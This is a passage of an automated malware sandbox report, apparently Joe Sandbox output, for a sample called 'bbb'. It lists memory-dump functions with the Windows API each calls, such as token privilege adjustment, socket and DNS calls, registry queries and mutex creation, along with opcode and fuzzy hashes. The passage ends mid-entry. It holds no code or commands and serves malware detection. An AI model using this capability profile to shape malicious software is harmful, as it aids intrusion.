Instruction Fuzzy Hash: 13425730B045508BDB68AB38E9557AE72E3AFC5308F04846DD9069BBD6DF35DD0AC781

Function 0593253F Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 059325BF

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: e73ff443806bf6b3736e0590a85daeffd016d099dab8859de492c59045188782
Instruction ID: c91b2a9278703a9994e346ceee388a253528f3ce7651532801c72d5953db00a7
Opcode Fuzzy Hash: e73ff443806bf6b3736e0590a85daeffd016d099dab8859de492c59045188782
Instruction Fuzzy Hash: 9A21D1755093809FDB228F25DC55B62BFF8FF06310F0884DAE9858B563D275E908DB62

Function 05932E7F Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 05932EF5

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 2189c0c41d02f03533b125ae84caa31cd6f313d4d9491f78702f6a63ed303494
Instruction ID: 70cffd3148f5f83fb128726d6edc0987146f17a53a38fb9cdcb494060b117a25
Opcode Fuzzy Hash: 2189c0c41d02f03533b125ae84caa31cd6f313d4d9491f78702f6a63ed303494
Instruction Fuzzy Hash: 9D218C7540D3C09FDB238F21DC55AA2FFB4EF0B220F0984DAE9C44B563D265A919DB62

Function 05932576 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 059325BF

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 95a059502520f0ce8033ae9a742753ede2d9d4cc1aabc361d1fcba06afed4c6f
Instruction ID: a901e7228959bc2ce4151d52802cafa5e29ebe6319d359bbc1a1903bb6a19d22
Opcode Fuzzy Hash: 95a059502520f0ce8033ae9a742753ede2d9d4cc1aabc361d1fcba06afed4c6f
Instruction Fuzzy Hash: E0119E79600200DFDB20CF55D885B66FBE9EF08220F08C8AAED468B652D335E518DB61

Function 00CBA09A Relevance: 1.5, APIs: 1, Instructions: 42networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,?,?), ref: 00CBA0D5

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 93aa3d3d5f173b1a70ba525c27a212ac3e53d3b7caa7fa40028cc38eddce3318
Instruction ID: 89b6f5868cdce6a5e4aa9bcead252b488429a1bd2dd9ffb7e97f39dd75d2cfd1
Opcode Fuzzy Hash: 93aa3d3d5f173b1a70ba525c27a212ac3e53d3b7caa7fa40028cc38eddce3318
Instruction Fuzzy Hash: 0F01F171500240DFDB60CF46D884BA5FBE4EF18320F08C49ADD898B612D335E408DBB2

Function 05932EBA Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 05932EF5

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 92896b3a35f4abf3636a777df7d94e75cad338dadf3d3fe1dfef5e4a82b1374e
Instruction ID: 37b3f1fa56444fb3dfd1968a74ac935bf128b544b5c64243d3d388c0e9c7bb07
Opcode Fuzzy Hash: 92896b3a35f4abf3636a777df7d94e75cad338dadf3d3fe1dfef5e4a82b1374e
Instruction Fuzzy Hash: F1018B79500640DFDB61CF45D885B66FBE4FF19620F08C49ADD494B652C375E418CBA2

Function 0606EAA8 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 443
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0606EF4E

Strings

f`k, xrefs: 0606ED63
f`k, xrefs: 0606ED2E
f`k, xrefs: 0606ECF9
f`k, xrefs: 0606EF49
:@k, xrefs: 0606EADD

Memory Dump Source

Source File: 00000004.00000002.3136598136.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6060000_bbb.jbxd

Similarity

API ID: InitializeThunk
String ID: :@k$f`k$f`k$f`k$f`k
API String ID: 2994545307-2661870366
Opcode ID: 8c9aa251fb481f83f40e11115036b3a9d3350fef5895bbb96befbe26e099d3d7
Instruction ID: 53dd6fe36d6a08258f20eda145b7b654d4c067c0714494e131b10ee0d4db5fbf
Opcode Fuzzy Hash: 8c9aa251fb481f83f40e11115036b3a9d3350fef5895bbb96befbe26e099d3d7
Instruction Fuzzy Hash: EB027A34F00205CFCB44EBB9D455AAEBBF2AF88304F258569E406AB395DB35DC46CB91

Function 06070F00 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 331
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06070F51

Strings

:@k, xrefs: 06070FE9

Memory Dump Source

Source File: 00000004.00000002.3136774311.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6070000_bbb.jbxd

Similarity

API ID: InitializeThunk
String ID: :@k
API String ID: 2994545307-2277858631
Opcode ID: b34eacd4fdbf77da54db37013fef6fe6ec6b40382d450b6ef8564e3014c844bb
Instruction ID: 8b88f1efb4fd2c5ac9a785b8c31c0b4ce9bbbbc9112dea7a75593120580256db
Opcode Fuzzy Hash: b34eacd4fdbf77da54db37013fef6fe6ec6b40382d450b6ef8564e3014c844bb
Instruction Fuzzy Hash: 4AC1A030F001148FCB48EBB8D894AADBBF2AF84314F158965D456EB795DB30EC46CB99

Function 06070EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 316
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06070F51

Strings

:@k, xrefs: 06070FE9

Memory Dump Source

Source File: 00000004.00000002.3136774311.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6070000_bbb.jbxd

Similarity

API ID: InitializeThunk
String ID: :@k
API String ID: 2994545307-2277858631
Opcode ID: 43df6f23c5da4a3c8becefcda5ed8c20f95bbef13d53dc8a97e2270b1f4f8bcb
Instruction ID: f7ae91f598341205401e77d0b58ef714c3390b26fb9d42ece1c84076841147df
Opcode Fuzzy Hash: 43df6f23c5da4a3c8becefcda5ed8c20f95bbef13d53dc8a97e2270b1f4f8bcb
Instruction Fuzzy Hash: CEC18030F401148FCB48DBB8D894AADBBF2AF84314F158569D456EB795DB30EC46CB98

Function 0606EEE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0606EF4E

Strings

f`k, xrefs: 0606EF49

Memory Dump Source

Source File: 00000004.00000002.3136598136.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6060000_bbb.jbxd

Similarity

API ID: InitializeThunk
String ID: f`k
API String ID: 2994545307-1028176591
Opcode ID: f3813be558257fd5695d650ca09c88690193e1224c5e0fd3471558e0ef955e85
Instruction ID: 7a91b94513fbc88527615c3b001d708d3d80f977d43183596bdcd158977f1b28
Opcode Fuzzy Hash: f3813be558257fd5695d650ca09c88690193e1224c5e0fd3471558e0ef955e85
Instruction Fuzzy Hash: E4513A74B002099FDB44EB79E945BAEB7F6AB88304F108529E506DB384EF309C45CBA1

Function 05028924 Relevance: 3.2, APIs: 2, Instructions: 249libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05028967
LdrInitializeThunk.NTDLL ref: 05028A1C

Memory Dump Source

Source File: 00000004.00000002.3131748345.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5020000_bbb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8500889175d6f5b786a9987401f6c13b963d9a37b67d02c0faf43054d1a9c7b7
Instruction ID: 26a44b64d43620e87a3088997f139a081aac252c8978be94c1202ae78a709c0b
Opcode Fuzzy Hash: 8500889175d6f5b786a9987401f6c13b963d9a37b67d02c0faf43054d1a9c7b7
Instruction Fuzzy Hash: 12A17B34B046248BDB58EF24DD55BAEB7F2AF98308F1084A9D40A97794DF349D86CF90

Function 0502891B Relevance: 3.2, APIs: 2, Instructions: 244libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 05028967
LdrInitializeThunk.NTDLL ref: 05028A1C

Memory Dump Source

Source File: 00000004.00000002.3131748345.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5020000_bbb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 761856ce300b0b2a65918452c9b38d8e4287989ee7e64f5070239c462653c7d4
Instruction ID: facecc1e1915450afa821742e4f42d9418ada458a7588626d70303e2ae4ceb54
Opcode Fuzzy Hash: 761856ce300b0b2a65918452c9b38d8e4287989ee7e64f5070239c462653c7d4
Instruction Fuzzy Hash: 06A16B34B046248BDB58DF24D955BAEB7F2AF98308F1084A9D40A97794DF349D86CF90

Function 06070070 Relevance: 1.7, APIs: 1, Instructions: 196
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 060700AE

Memory Dump Source

Source File: 00000004.00000002.3136774311.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6070000_bbb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 621743fb6fb67ed350a1a932640610634a588d5c18bf1e3414688691f4639903
Instruction ID: 42b4b26dfd46f32502c52fe697194ddc069b5c0909d4cf044c856ac0a92b7443
Opcode Fuzzy Hash: 621743fb6fb67ed350a1a932640610634a588d5c18bf1e3414688691f4639903
Instruction Fuzzy Hash: 85718E71E00209DFDB44EFA4D899BAEBBF2AF88314F258528D402A7354CF399C45CB94

Function 05021D69 Relevance: 1.6, APIs: 1, Instructions: 124
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 05021E71

Memory Dump Source

Source File: 00000004.00000002.3131748345.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5020000_bbb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fd674767c022212f2831dddee9f4f26e489ca95aa0127e36728cbefddc675409
Instruction ID: 4af49319e58844551d2a404e04aa49e02aa56d4dd7685dc45c1afa375c0b6df4
Opcode Fuzzy Hash: fd674767c022212f2831dddee9f4f26e489ca95aa0127e36728cbefddc675409
Instruction Fuzzy Hash: 63418030B086109FC7A8EF74E68266E77E3FB85308F50456ED5629BB54DB32E845CB50

Function 06074980 Relevance: 1.6, APIs: 1, Instructions: 117
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06074A79

Memory Dump Source

Source File: 00000004.00000002.3136774311.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6070000_bbb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5784c2a1c7db30aa6090d631f90cf35d2029fbaeb8ea26eac2455e77b107bb41
Instruction ID: 759abcf081d37c72c6124dde423ace5cf495be477512ceb8762b0b13604299f7
Opcode Fuzzy Hash: 5784c2a1c7db30aa6090d631f90cf35d2029fbaeb8ea26eac2455e77b107bb41
Instruction Fuzzy Hash: 68418134F407008FC7A9AF78D68166EBBE2EB85648F61852EC1125BF59D732EC41CB94

Function 06074971 Relevance: 1.6, APIs: 1, Instructions: 116
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06074A79

Memory Dump Source

Source File: 00000004.00000002.3136774311.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6070000_bbb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e9c468fd5d3fd91bb255f4e379e74dbf85d20c8c9327beb3a73312aca533611c
Instruction ID: d792b11027dfe3a5d1a1eccadedfc5030f7a31c1438050b413d598fab7da6f93
Opcode Fuzzy Hash: e9c468fd5d3fd91bb255f4e379e74dbf85d20c8c9327beb3a73312aca533611c
Instruction Fuzzy Hash: 65419E34F406008FC7A99F38D68266EBBE2EB85244F61852EC0025BB59D732EC81CB54

Function 06070006 Relevance: 1.6, APIs: 1, Instructions: 104libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 060700AE

Memory Dump Source

Source File: 00000004.00000002.3136774311.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6070000_bbb.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 96f2987ed169a714ee07a7469efd3548f8c3688b23bf355abc218a1369a90827
Instruction ID: 14e81ebe038be0f4ecd32cc646cbfe6bd5119a299d051593ffa7df0260f2b39b
Opcode Fuzzy Hash: 96f2987ed169a714ee07a7469efd3548f8c3688b23bf355abc218a1369a90827
Instruction Fuzzy Hash: 5631E23184A3849FC7468B74DC55AEE7FB5EF07300F1981D6E041DB262CB384845CBA2

Function 05930AB8 Relevance: 1.6, APIs: 1, Instructions: 104fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32(00000000), ref: 05930B6A

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: db80c3ffad2a2d1a9d30462c5c8d19011f603e626fd773c342b1f881e4a85097
Instruction ID: 066eecfafa08905bc0731bceff2da2eaadde86e886bb50180349b5e00ad1b103
Opcode Fuzzy Hash: db80c3ffad2a2d1a9d30462c5c8d19011f603e626fd773c342b1f881e4a85097
Instruction Fuzzy Hash: E03116724093849FDB228B65CC49F96BFB8EF06324F0844DEE4858B653D325E50AC762

Function 00CBBD62 Relevance: 1.6, APIs: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 00CBBE21

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: afb1fe36b3816bf26d996002b239bcaef7d0063ae67c0b88b04a4db5505ba549
Instruction ID: 87f523b3f52d8e028cc2b5c75f52ed1cffdf85d0cef290565f0fae5323d40b38
Opcode Fuzzy Hash: afb1fe36b3816bf26d996002b239bcaef7d0063ae67c0b88b04a4db5505ba549
Instruction Fuzzy Hash: 7831B371505380AFE712CF65DC44BA2BFE8EF06314F08849AE9858B653D375E909C771

Function 05932047 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E24), ref: 0593211F

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 74ceffa1295043fbf2fb9e1a6fbf1886da1d4481784a66d2e7d89b189000aecb
Instruction ID: a3dd17767a8bba763a3e67204efd7f1aab27b67848b48d92bbfbe275f1cdb095
Opcode Fuzzy Hash: 74ceffa1295043fbf2fb9e1a6fbf1886da1d4481784a66d2e7d89b189000aecb
Instruction Fuzzy Hash: 8E31D2B1504344AFE7228B61CD84FA6BBBCEF05314F04449AFA849B692D378A94DCB71

Function 059303F8 Relevance: 1.6, APIs: 1, Instructions: 95networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 059304AA

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: bbc35ed9270387fde7c96c26c57ab89e1286d0fbe1f5c3ee0bceb468d17b6a08
Instruction ID: 95dbad09a2300551f39643b2c38dc532c7ccf6e7aa2464ada489d103d6b4b464
Opcode Fuzzy Hash: bbc35ed9270387fde7c96c26c57ab89e1286d0fbe1f5c3ee0bceb468d17b6a08
Instruction Fuzzy Hash: D031C6714093C0AFD7238B65CC49F56BFB8EF06210F0884DAE9858B5A3D365A919C771

Function 0593141F Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

GetVolumeInformationA.KERNEL32(?,00000E24,?,?), ref: 059314E2

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: fbf497789456318c9655d15b08fdba761389692d6b3b38238d1748a9afb5822f
Instruction ID: dc5042360397c2dda1f5b818a34e706bc6c1391982db46851b42df6113dd4a87
Opcode Fuzzy Hash: fbf497789456318c9655d15b08fdba761389692d6b3b38238d1748a9afb5822f
Instruction Fuzzy Hash: F6318F7154D3C45FD3038B258C61AA2BFB4EF47614F0A84CBD8849F6A3D624691AC7B2

Function 05931134 Relevance: 1.6, APIs: 1, Instructions: 94COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,00000E24), ref: 059311D3

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: dc931477f2d374c22678caf66cd0b7763e010919ad99f928e22e742f5ba190d9
Instruction ID: 124a8c2258d64f091806f8b18090bd4a7c9b63260172935426cb21a1ecefd9a0
Opcode Fuzzy Hash: dc931477f2d374c22678caf66cd0b7763e010919ad99f928e22e742f5ba190d9
Instruction Fuzzy Hash: D531C471504344AFEB228B61DC44FA7BBBCEF49210F04485AF985CB552D334A549CB71

Function 05931321 Relevance: 1.6, APIs: 1, Instructions: 92networkCOMMON

Download Yara Rule

APIs

WSAIoctl.WS2_32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 059313D5

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 2fec865d617403f66aec7e6df41f53bb2258e08ac07bd205deaa4c85c0c691b9
Instruction ID: adf9c37ce00fd5f1eae1c5bf1fd754716330aae1b3b34e55f499c75c04959a7c
Opcode Fuzzy Hash: 2fec865d617403f66aec7e6df41f53bb2258e08ac07bd205deaa4c85c0c691b9
Instruction Fuzzy Hash: 98318F75509780AFE7228F61CC44FA2BFF8EF06714F08849AE9858B562D334E949DB71

Function 0593102C Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 059310C9

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 7a868177c64283109a97aa7f4734911ef4adca6a4dbb84af7eae72ceb1c4ca63
Instruction ID: 7685b973caa9afc941a95a1f6ce403f138cad0377bf91414d4f667a1afa41117
Opcode Fuzzy Hash: 7a868177c64283109a97aa7f4734911ef4adca6a4dbb84af7eae72ceb1c4ca63
Instruction Fuzzy Hash: BF31F6755093809FD7228F65CD45BA6BFB8EF46310F0844DAE8858F163D3249509CB71

Function 00CBB6CD Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 00CBB788

Memory Dump Source

Source File: 00000004.00000002.3074534296.0000000000CBA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CBA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_cba000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 56bbc7f863f96911826f244e166379ea70caa3fc265bf984b207a799359730e3
Instruction ID: ee5ed15b9c0e5f37f2323b974ba11183404d61f101d1bbd0d4fac1a9d79f9969
Opcode Fuzzy Hash: 56bbc7f863f96911826f244e166379ea70caa3fc265bf984b207a799359730e3
Instruction Fuzzy Hash: 0831DF751083846FD722CB21CC84FA2BFB8EF46314F08849AE885CB653D364E948CB71

Function 05930820 Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 059308B7

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: afb98588f04551752aa21afd944b3f1a74551aa95544e37c049f80df7b3275e5
Instruction ID: 24848c269592775bf51318eb610d3a08a7cbfc215e9130082f98e3ceab53eaff
Opcode Fuzzy Hash: afb98588f04551752aa21afd944b3f1a74551aa95544e37c049f80df7b3275e5
Instruction Fuzzy Hash: BD31BF72504384AFE7218B65DC45FA7BBACEF05220F08849AE984CB652D324E948CB61

Function 05930722 Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 059307CC

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 2d7c921a649b9def47433cdf4edbf7c81338bb11047553e3a72b19f2415f1534
Instruction ID: a97142129f15511d56dcb656042326d7105457bb50ae97776213df193dec8f9e
Opcode Fuzzy Hash: 2d7c921a649b9def47433cdf4edbf7c81338bb11047553e3a72b19f2415f1534
Instruction Fuzzy Hash: 12318176509380AFD722CB25CC45F92BFF8EF06314F0884DAE9858B663D264A949CB71

Function 05931231 Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 059312D7

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 635054f4764e333bd5de34af304633b43fe914c76e99df1341fa7c273dac91d0
Instruction ID: e417e945e5ea5d733034ba58613ae6fa71d3071b8c40b7bc99663550cd4923df
Opcode Fuzzy Hash: 635054f4764e333bd5de34af304633b43fe914c76e99df1341fa7c273dac91d0
Instruction Fuzzy Hash: 4F31C275409784AFD712CB25CC45FA6BFB8EF46310F0984DAE9848F563C225A908C771

Function 05930D6D Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 05930E0D

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: ed266d8bc2238d827bb50ba5cfac975b4a690e38981c4e82acd39697d9b8dfb0
Instruction ID: 9e7f369732dcba0ab854d0b20f940dea8a653d26df24e25ddc218f57b2fa727f
Opcode Fuzzy Hash: ed266d8bc2238d827bb50ba5cfac975b4a690e38981c4e82acd39697d9b8dfb0
Instruction Fuzzy Hash: DE3184B1509380AFE721CB65CD45F56FFF8EF05210F08849AE985CB652D375E948CB61

Function 05934DDC Relevance: 1.6, APIs: 1, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,4D31662F,00000000,00000000,00000000,00000000), ref: 05934E78

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 5a5107149a916676abfed4c6dd2ce884766725b93a89d4d8ecfde326801501be
Instruction ID: c662dc9d39c0c55af56c8d6cba9dc48a7e96d8a6e96c5a15d43a1c849df25d8e
Opcode Fuzzy Hash: 5a5107149a916676abfed4c6dd2ce884766725b93a89d4d8ecfde326801501be
Instruction Fuzzy Hash: 84218175509380AFD722CB51CC45FA7BFF8EF46610F08889AE985CB652D224E948C771

Function 0593207A Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E24), ref: 0593211F

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: a2ca26267e1054ae93bb47be8b0005ad995c735ce47c7e67c7330da9f2130a46
Instruction ID: 667139739ee13037cbe4470bca6be6066dca96f94cb2667927bc9b130566a817
Opcode Fuzzy Hash: a2ca26267e1054ae93bb47be8b0005ad995c735ce47c7e67c7330da9f2130a46
Instruction Fuzzy Hash: 5321A171500204AEFB31DB61CE85FAAF7ACEF04714F04485AFA499A681D774E54D8B71

Function 059316B4 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E24), ref: 0593174D

Memory Dump Source

Source File: 00000004.00000002.3132763480.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5930000_bbb.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: 4f3783d3ae40e5703e2f671e358edbb4b1ac9a24d61cbb64945242941899ee9a
Instruction ID: 2a874ac26d9a886fcb2c0caae3b106384450a1fd47c5538439c2904484460610
